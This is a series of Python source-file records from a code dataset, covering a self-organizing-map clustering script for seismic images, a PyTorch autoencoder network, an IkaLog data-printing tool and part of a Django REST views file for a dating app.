"torch.ones", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 131, "usage_type": "call"}, 
{"api_name": "harvard.Tool.subsequent_mask", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "1412460", "text": "from minisom import MiniSom\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\n \"TkAgg\"\n) # suggested to avoid AttributeError: 'FigureCanvasMac' object has no attribute 'renderer'\nimport matplotlib.pyplot as plt\n#%matplotlib inline # used in order to see plot in notebook\n\n\n# show seimsic image \n\n# get data to use \ndata_cube = np.load(\"/Users/anderskampenes/Documents/Dokumenter/NTNU/MASTER/code/data/raw/f3-benchmark/test_once/test1_seismic.npy\")\n# make sure it is fomrated correctly \nimg = data_cube[:,0,:].T\n#plt.imshow(img)\n#plt.show()\npixels = np.reshape(img, (img.shape[0]*img.shape[1], 1))\n\n\n# initialize a 6-by-6 SOM with a learning rate of 0.5.\nsom = MiniSom(x= 2, y = 2, input_len = 1, sigma=0.1, learning_rate=0.2)\nsom.random_weights_init(pixels)\n\n# save init weight for later visualization \nstarting_weights = som.get_weights().copy()\n\n#Then we train the SOM on 100 iterations.\nsom.train_random(pixels, 100)\n\n# quantize each pixel of the image\nqnt = som.quantization(pixels)\n\nprint(\"mlknbbkjbkjbjkbjk\")\n# building new image\nclustered = np.zeros(img.shape)\nfor i, q in enumerate(qnt):\n clustered[np.unravel_index(i, shape=(img.shape[0], img.shape[1]))] = q\n\nprint(\"done unraveling\", img.shape, clustered.shape,starting_weights.shape, som.get_weights().shape)\n\nplt.figure(figsize=(12, 6))\nplt.subplot(221)\nplt.title('Original')\nplt.imshow(img)\nplt.subplot(222)\nplt.title('Result')\nplt.imshow(clustered)\n\n\nplt.subplot(223)\nplt.title('Initial Colors')\nplt.imshow(np.squeeze(starting_weights))\nplt.subplot(224)\nplt.title('Learnt Colors')\nplt.imshow(np.squeeze(som.get_weights()))\n\nplt.tight_layout()\nplt.show()", "sub_path": "scripts/GTA/gta.py", "file_name": "gta.py", "file_ext": "py", "file_size_in_byte": 1627, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.use", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 19, "usage_type": "call"}, {"api_name": "minisom.MiniSom", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 46, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.squeeze", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "numpy.squeeze", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "610663970", "text": "import torch \nfrom torch import nn as nn\nimport numpy as np \n\n\n\n\nclass CNNEncoder(nn.Module):\n def __init__(self,\n input_width,\n input_height,\n input_channels,\n output_size,\n kernel_sizes,\n n_channels,\n strides,\n paddings,\n hidden_sizes=None,\n added_fc_input_size=0,\n batch_norm_conv=False,\n batch_norm_fc=False,\n init_w=1e-4,\n hidden_init=nn.init.xavier_uniform_,\n hidden_activation=nn.ReLU()):\n super(CNNEncoder, self).__init__()\n if hidden_sizes is None:\n self.hidden_sizes = []\n else:\n self.hidden_sizes = hidden_sizes\n assert (len(kernel_sizes) == \\\n len(n_channels) == \\\n len(strides) == \\\n len(paddings)), \"size of kernel, n_channels, strides, and paddings is not equal\"\n\n \n self.input_width = input_width\n self.input_height = input_height\n self.input_channels = input_channels\n self.output_size = output_size\n self.kernel_sizes = kernel_sizes\n self.n_channels = n_channels\n self.strides = strides\n self.paddings = paddings\n self.added_fc_input_size = added_fc_input_size\n self.batch_norm_conv = batch_norm_conv\n self.batch_norm_fc = batch_norm_fc\n self.hidden_int = hidden_init\n self.hidden_activation = hidden_activation\n\n self.conv_layers = nn.ModuleList()\n self.conv_norm_layers = nn.ModuleList()\n self.fc_layers = nn.ModuleList()\n self.fc_norm_layers = nn.ModuleList()\n\n for output_channel, kernel_size, stride, padding in zip(self.n_channels, self.kernel_sizes, self.strides, self.paddings):\n\n conv = nn.Conv2d(self.input_channels,\n output_channel,\n kernel_size,\n stride=stride,\n 
padding=padding)\n hidden_init(conv.weight)\n conv.bias.data.fill_(0)\n\n self.conv_layers.append(conv)\n self.input_channels = output_channel\n\n # a test matrix to compute number channels of CNN \n test_mat = torch.zeros(1, input_channels, self.input_width, self.input_height)\n \n for conv_layer in self.conv_layers:\n test_mat = conv_layer(test_mat)\n self.conv_norm_layers.append(nn.BatchNorm2d(test_mat.shape[1]))\n \n fc_input_size = int(np.prod(test_mat.shape))\n\n for idx, hidden_size in enumerate(self.hidden_sizes):\n\n fc_layer = nn.Linear(fc_input_size, hidden_size)\n fc_norm_layer = nn.BatchNorm1d(hidden_size)\n\n fc_layer.weight.data.uniform_(-init_w, init_w)\n fc_layer.bias.data.uniform_(-init_w, init_w)\n\n self.fc_layers.append(fc_layer)\n self.fc_norm_layers.append(fc_norm_layer)\n fc_input_size = hidden_size\n\n self.last_fc = nn.Linear(fc_input_size, self.output_size)\n self.last_fc.weight.data.uniform_(-init_w, init_w)\n self.last_fc.bias.data.uniform_(-init_w, init_w)\n\n def forward(self,x):\n h = self.apply_forward(x, self.conv_layers, self.conv_norm_layers,\n use_batch_norm=self.batch_norm_conv)\n\n h = h.view(h.size(0), -1)\n\n h= self.apply_forward(h, self.fc_layers, self.fc_norm_layers,\n use_batch_norm=self.batch_norm_fc)\n\n output = self.last_fc(h)\n return output\n\n def apply_forward(self,\n input,\n hidden_layers,\n norm_layers,\n use_batch_norm=False):\n h = input\n for layer, norm_layer in zip(hidden_layers, norm_layers):\n h = layer(h)\n if use_batch_norm:\n h = norm_layer(h)\n h = self.hidden_activation(h)\n return h\n\nclass DCNNDecoder(nn.Module):\n def __init__(self,\n fc_input_size,\n hidden_sizes,\n\n deconv_input_width,\n deconv_input_height,\n deconv_input_channels,\n\n deconv_output_kernel_size,\n deconv_output_strides,\n deconv_output_channels,\n\n kernel_sizes,\n strides,\n paddings,\n n_channels,\n batch_norm_deconv=False,\n batch_norm_fc=False,\n init_w=1e-3,\n hidden_init=nn.init.xavier_uniform_,\n hidden_activation=nn.ReLU()\n ):\n super(DCNNDecoder, self).__init__()\n assert (len(n_channels) == \\\n len(paddings) == \\\n len(strides) == \\\n len(kernel_sizes)), \"size of kernel, n_channels, strides, and padding is not equal\"\n\n self.hidden_sizes = hidden_sizes\n self.hidden_activation = hidden_activation\n self.deconv_input_width = deconv_input_width\n self.deconv_input_height = deconv_input_height\n self.deconv_input_channels = deconv_input_channels\n deconv_input_size = self.deconv_input_width*self.deconv_input_height*self.deconv_input_channels\n self.batch_norm_deconv = batch_norm_deconv\n self.batch_norm_fc = batch_norm_fc\n\n self.deconv_layers = nn.ModuleList()\n self.deconv_norm_layers = nn.ModuleList()\n self.fc_layers = nn.ModuleList()\n self.fc_norm_layers = nn.ModuleList()\n input_size = fc_input_size\n\n for idx, hidden_size in enumerate(self.hidden_sizes):\n\n fc_layer = nn.Linear(input_size, hidden_size)\n fc_layer.weight.data.uniform_(-init_w, init_w)\n fc_layer.bias.data.uniform_(-init_w, init_w)\n input_size = hidden_size\n self.fc_layers.append(fc_layer)\n\n fc_norm_layer = nn.BatchNorm1d(hidden_size)\n self.fc_norm_layers.append(fc_norm_layer)\n\n self.last_fc = nn.Linear(input_size, deconv_input_size)\n self.last_fc.weight.data.uniform_(-init_w, init_w)\n self.last_fc.bias.data.uniform_(-init_w, init_w)\n\n for out_channel, kernel_size, stride, padding in \\\n zip(n_channels, kernel_sizes, strides, paddings):\n deconv_layer = nn.ConvTranspose2d(deconv_input_channels,\n out_channel,\n kernel_size,\n stride=stride,\n 
padding=padding)\n hidden_init(deconv_layer.weight)\n deconv_layer.bias.data.fill_(0)\n\n self.deconv_layers.append(deconv_layer)\n deconv_input_channels = out_channel\n\n # a test matrix to compute number channels of CNN for BatchNorm2d\n test_mat = torch.zeros(1, self.deconv_input_channels,\n self.deconv_input_width,\n self.deconv_input_height)\n\n for deconv in self.deconv_layers:\n test_mat = deconv(test_mat)\n self.deconv_norm_layers.append(nn.BatchNorm2d(test_mat.shape[1]))\n \n self.first_deconv_output = nn.ConvTranspose2d(\n deconv_input_channels,\n deconv_output_channels,\n deconv_output_kernel_size,\n stride=deconv_output_strides,\n )\n hidden_init(self.first_deconv_output.weight)\n self.first_deconv_output.bias.data.fill_(0)\n self.sigmoid = nn.Sigmoid()\n self.relu = nn.ReLU()\n\n def forward(self, input):\n h = self.apply_forward(input,self.fc_layers,\n self.fc_norm_layers, use_batch_norm=self.batch_norm_fc)\n h = self.hidden_activation(self.last_fc(h))\n h = h.view(-1, self.deconv_input_channels, self.deconv_input_width,\n self.deconv_input_height)\n h = self.apply_forward(h, self.deconv_layers, self.deconv_norm_layers,\n use_batch_norm=self.batch_norm_deconv)\n h = self.first_deconv_output(h) \n output = self.sigmoid(h)\n # output = self.relu(h)\n return output\n\n def apply_forward(self, input, hidden_layers, norm_layers,\n use_batch_norm=False):\n h = input\n for layer, norm_layer in zip(hidden_layers, norm_layers):\n h = layer(h)\n if use_batch_norm:\n h = norm_layer(h)\n h = self.hidden_activation(h)\n return h\n\nclass Model(nn.Module):\n def __init__(self, encoder_param, decoder_param):\n super(Model, self).__init__()\n # print('encoder_param: ',encoder_param)\n self.encoder_param = encoder_param\n self.decoder_param = decoder_param\n self.encoder = CNNEncoder(\n input_width = self.encoder_param['input_width'],\n input_height = self.encoder_param['input_height'],\n input_channels = self.encoder_param['input_channels'],\n output_size = self.encoder_param['output_size'],\n kernel_sizes = self.encoder_param['kernel_sizes'],\n n_channels = self.encoder_param['n_channels'],\n strides = self.encoder_param['strides'],\n paddings = self.encoder_param['paddings'],\n hidden_sizes = self.encoder_param['hidden_sizes'],\n batch_norm_conv = self.encoder_param['batch_norm_conv'],\n batch_norm_fc = self.encoder_param['batch_norm_fc'],\n init_w = self.encoder_param['init_w'],\n hidden_init = self.encoder_param['hidden_init'],\n hidden_activation = self.encoder_param['hidden_activation']\n )\n self.decoder = DCNNDecoder(\n fc_input_size = self.decoder_param['fc_input_size'],\n hidden_sizes = self.decoder_param['hidden_sizes'],\n deconv_input_width = self.decoder_param['deconv_input_width'],\n deconv_input_height = self.decoder_param['deconv_input_height'],\n deconv_input_channels = self.decoder_param['deconv_input_channels'],\n kernel_sizes = self.decoder_param['kernel_sizes'],\n strides = self.decoder_param['strides'],\n paddings = self.decoder_param['paddings'],\n n_channels = self.decoder_param['n_channels'],\n batch_norm_deconv = self.decoder_param['batch_norm_deconv'],\n batch_norm_fc = self.decoder_param['batch_norm_fc'],\n init_w = self.decoder_param['init_w'],\n hidden_init = self.decoder_param['hidden_init'],\n hidden_activation = self.decoder_param['hidden_activation'],\n deconv_output_channels = self.decoder_param['deconv_output_channels'],\n deconv_output_kernel_size = self.decoder_param['deconv_output_kernel_size'],\n deconv_output_strides = 
self.decoder_param['deconv_output_strides']\n )\n def forward(self, input):\n z = self.encoder(input)\n input_reconstruction = self.decoder(z)\n return input_reconstruction, z\n", "sub_path": "vae_network.py", "file_name": "vae_network.py", "file_ext": "py", "file_size_in_byte": 10721, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.init", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "numpy.prod", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 118, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.nn.init", "line_number": 138, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 138, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 157, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 158, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 164, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, 
"usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 197, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 199, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 199, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 207, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 208, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 233, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 233, "usage_type": "name"}]} +{"seq_id": "73503506", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# IkaLog\n# ======\n# Copyright (C) 2016 Takeshi HASEGAWA\n# Copyright (C) 2016 Hiroyuki KOMATSU\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# tools/print_data.py is a command to print out data analyzed by IkaLog.\n# Usage:\n# ./tools/print_data.py --json ika.json\n# ./tools/print_data.py --statink statink.msgpack\n\nimport argparse\nimport json\nimport os\nimport pprint\nimport sys\nimport time\nimport umsgpack\n\n# Append the Ikalog root dir to sys.path to import IkaUtils.\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nimport IkaConfig\nfrom ikalog.utils.statink_uploader import UploadToStatInk\nfrom ikalog.utils.ikautils import IkaUtils\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--statink', dest='statink', type=str)\n parser.add_argument('--json', dest='json', type=str)\n\n return vars(parser.parse_args())\n\n\ndef print_statink(filepath):\n with open(filepath, 'rb') as data:\n payload = umsgpack.unpack(data)\n\n if 'image_result' in payload:\n payload['image_result'] = '(PNG Data)'\n\n if 'image_judge' in payload:\n payload['image_judge'] = '(PNG Data)'\n\n if 'image_gear' in payload:\n payload['image_gear'] = '(PNG Data)'\n\n if 'events' in payload:\n payload['events'] = '(Events)'\n\n pprint.pprint(payload)\n\n\ndef print_json(filepath):\n with open(filepath, 'r') as data:\n for line in data:\n if not line.rstrip():\n continue\n json_data = json.loads(line)\n print(json.dumps(json_data, sort_keys=True, ensure_ascii=False,\n indent=2, separators=(',', ': ')))\n\n\ndef main():\n args = get_args()\n if args.get('statink'):\n print_statink(args['statink'])\n elif args.get('json'):\n print_json(args['json'])\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tools/print_data.py", "file_name": "print_data.py", "file_ext": "py", 
"file_size_in_byte": 2412, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.append", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 42, "usage_type": "call"}, {"api_name": "umsgpack.unpack", "line_number": 51, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 65, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "167990352", "text": "import os\nimport shutil\n\nimport instaloader\nfrom django.contrib.auth import get_user_model\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django_filters import rest_framework\nfrom rest_framework.generics import CreateAPIView, ListAPIView, UpdateAPIView, ListCreateAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_201_CREATED, HTTP_400_BAD_REQUEST, HTTP_200_OK\nfrom rest_framework.views import APIView\n\nfrom .models import UserInstagramPic, UserDetail, RegisterUser, MatchedUser, RequestMeeting, ScheduleMeeting, Feedback, \\\n AboutUs, ContactUs, InAppNotification, SubscriptionPlans\nfrom .serializers import (UserDetailSerializer, UserInstagramSerializer, RegisterSerializer,\n MatchedUserSerializer, LikeSerializer, DeleteMatchSerializer, SuperLikeSerializer,\n RequestMeetingSerializer, ScheduleMeetingSerializer, FeedbackSerializer, ContactUsSerializer,\n AboutUsSerializer, MeetingStatusSerializer, PopUpNotificationSerializer,\n SubscriptionPlanSerializer, DeleteSuperMatchSerializer, SearchSerializer,\n GetInstagramPicSerializer, SocialUserSerializer, ShowInstaPics)\n\nUser = get_user_model()\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass UserCreateAPIView(CreateAPIView):\n serializer_class = RegisterSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = RegisterSerializer(data=self.request.data)\n first_name = self.request.data['first_name']\n last_name = self.request.data['last_name']\n phone_number = self.request.data['phone_number']\n gender = self.request.data['gender']\n date_of_birth = self.request.data['date_of_birth']\n job_profile = self.request.data['job_profile']\n company_name = self.request.data['company_name']\n email = self.request.data['email']\n qualification = self.request.data['qualification']\n relationship_status = self.request.data['relationship_status']\n interests = self.request.data['interests']\n fav_quote = self.request.data['fav_quote']\n # liked_by = RegisterUser.objects.filter(id=phone_number)\n # superliked_by = RegisterUser.objects.filter(id=phone_number)\n pic_1 = self.request.data['pic_1']\n pic_2 = self.request.data['pic_2']\n pic_3 = self.request.data['pic_3']\n pic_4 = self.request.data['pic_4']\n pic_5 = self.request.data['pic_5']\n pic_6 = self.request.data['pic_6']\n pic_7 = self.request.data['pic_7']\n pic_8 = self.request.data['pic_8']\n pic_9 = self.request.data['pic_9']\n user_qs = RegisterUser.objects.filter(\n phone_number__iexact=phone_number)\n if 
user_qs.exists():\n serializer.is_valid(raise_exception=True)\n return Response({\"Phone number\": \"User with this phone number already exists.\"},\n status=HTTP_400_BAD_REQUEST)\n if serializer.is_valid():\n user = RegisterUser.objects.create(\n email=email,\n first_name=first_name,\n last_name=last_name,\n phone_number=phone_number,\n gender=gender,\n date_of_birth=date_of_birth,\n job_profile=job_profile,\n company_name=company_name,\n qualification=qualification,\n relationship_status=relationship_status,\n interests=interests,\n fav_quote=fav_quote,\n # liked_by=liked_by,\n # superliked_by=superliked_by,\n pic_1=pic_1,\n pic_2=pic_2,\n pic_3=pic_3,\n pic_4=pic_4,\n pic_5=pic_5,\n pic_6=pic_6,\n pic_7=pic_7,\n pic_8=pic_8,\n pic_9=pic_9\n )\n UserDetail.objects.create(\n phone_number=user\n )\n\n # for x in liked_by:\n # RegisterUser.liked_by.add(x)\n # for y in superliked_by:\n # RegisterUser.superliked_by.add(y)\n user_data = RegisterUser.objects.get(phone_number=phone_number)\n if user_data.pic_1:\n pic_1 = user_data.pic_1.url\n else:\n pic_1 = ''\n if user_data.pic_2:\n pic_2 = user_data.pic_2.url\n else:\n pic_2 = ''\n if user_data.pic_3:\n pic_3 = user_data.pic_3.url\n else:\n pic_3 = ''\n if user_data.pic_4:\n pic_4 = user_data.pic_4.url\n else:\n pic_4 = ''\n if user_data.pic_5:\n pic_5 = user_data.pic_5.url\n else:\n pic_5 = ''\n if user_data.pic_6:\n pic_6 = user_data.pic_6.url\n else:\n pic_6 = ''\n if user_data.pic_8:\n pic_8 = user_data.pic_8.url\n else:\n pic_8 = ''\n if user_data.pic_9:\n pic_9 = user_data.pic_9.url\n else:\n pic_9 = ''\n Data = {\n \"id\": user_data.id,\n \"email\": user_data.email,\n \"first_name\": user_data.first_name,\n \"last_name\": user_data.last_name,\n \"phone_number\": user_data.phone_number,\n \"gender\": user_data.gender,\n \"date_of_birth\": user_data.date_of_birth,\n \"job_profile\": user_data.job_profile,\n \"company_name\": user_data.company_name,\n \"qualification\": user_data.qualification,\n \"relationship_status\": user_data.relationship_status,\n \"interests\": user_data.interests,\n \"fav_quote\": user_data.fav_quote,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n }\n return Response({\"User\": \"User Created successfully\", \"Data\": Data},\n status=HTTP_201_CREATED)\n\n\n# class GetUserToken(ObtainAuthToken):\n# serializer_class = GetUserTokenSerializer\n\n# def post(self, request, *args, **kwargs):\n# phone_number = self.request.data['phone_number']\n# user = RegisterUser.objects.get(phone_number=phone_number).user\n# print('--------------->>>>>>',user)\n# try:\n# user_with_token = Token.objects.get(user=user)\n# print('TRY-------------->>>',user_with_token)\n# if user_with_token:\n# print('TRY If-------------->>>',user_with_token)\n# return Response({\"Token\": user_with_token.key})\n# except Exception as e:\n# print(e)\n# token = Token.objects.create(user=user)\n# print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>', token)\n# return Response({\"Token\": token.key}, status=HTTP_200_OK)\n\n\nclass UpdatePhoneNumber(UpdateAPIView):\n serializer_class = RegisterSerializer\n queryset = RegisterUser.objects.all()\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.phone_number = request.data.get('phone_number')\n instance.save(update_fields=['phone_number'])\n logged_in_user_id = self.request.data['id']\n from_id = logged_in_user_id\n from_user_id = 
RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type=\"Phone Number Update\",\n notification_title=\"Phone Number\",\n notification_body=\"Your Phone number has been updated\"\n )\n return Response({\"Your phone number has been updated\"}, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass UserProfileAPIView(ListCreateAPIView):\n model = UserDetail\n serializer_class = UserDetailSerializer\n\n def get(self, request, *args, **kwargs):\n id = self.request.GET.get('id')\n user = UserDetail.objects.get(id=id)\n if user.phone_number.pic_1:\n pic_1 = user.phone_number.pic_1.url\n else:\n pic_1 = ''\n if user.phone_number.pic_2:\n pic_2 = user.phone_number.pic_2.url\n else:\n pic_2 = ''\n if user.phone_number.pic_3:\n pic_3 = user.phone_number.pic_3.url\n else:\n pic_3 = ''\n if user.phone_number.pic_4:\n pic_4 = user.phone_number.pic_4.url\n else:\n pic_4 = ''\n if user.phone_number.pic_5:\n pic_5 = user.phone_number.pic_5.url\n else:\n pic_5 = ''\n if user.phone_number.pic_6:\n pic_6 = user.phone_number.pic_6.url\n else:\n pic_6 = ''\n if user.phone_number.pic_7:\n pic_7 = user.phone_number.pic_7.url\n else:\n pic_7 = ''\n if user.phone_number.pic_8:\n pic_8 = user.phone_number.pic_8.url\n else:\n pic_8 = ''\n if user.phone_number.pic_9:\n pic_9 = user.phone_number.pic_9.url\n else:\n pic_9 = ''\n detail = {\n \"id\": user.id,\n \"bio\": user.bio,\n \"first_name\": user.phone_number.first_name,\n \"last_name\": user.phone_number.last_name,\n \"email\": user.phone_number.email,\n \"gender\": user.phone_number.gender,\n \"date_of_birth\": user.phone_number.date_of_birth,\n \"job_profile\": user.phone_number.job_profile,\n \"company_name\": user.phone_number.company_name,\n \"qualification\": user.phone_number.qualification,\n \"relationship_status\": user.phone_number.relationship_status,\n \"interests\": user.phone_number.interests,\n \"fav_quote\": user.phone_number.fav_quote,\n \"religion\": user.phone_number.religion,\n \"body_type\": user.phone_number.body_type,\n \"verified\": user.phone_number.verified,\n \"fb_signup\": user.phone_number.fb_signup,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": 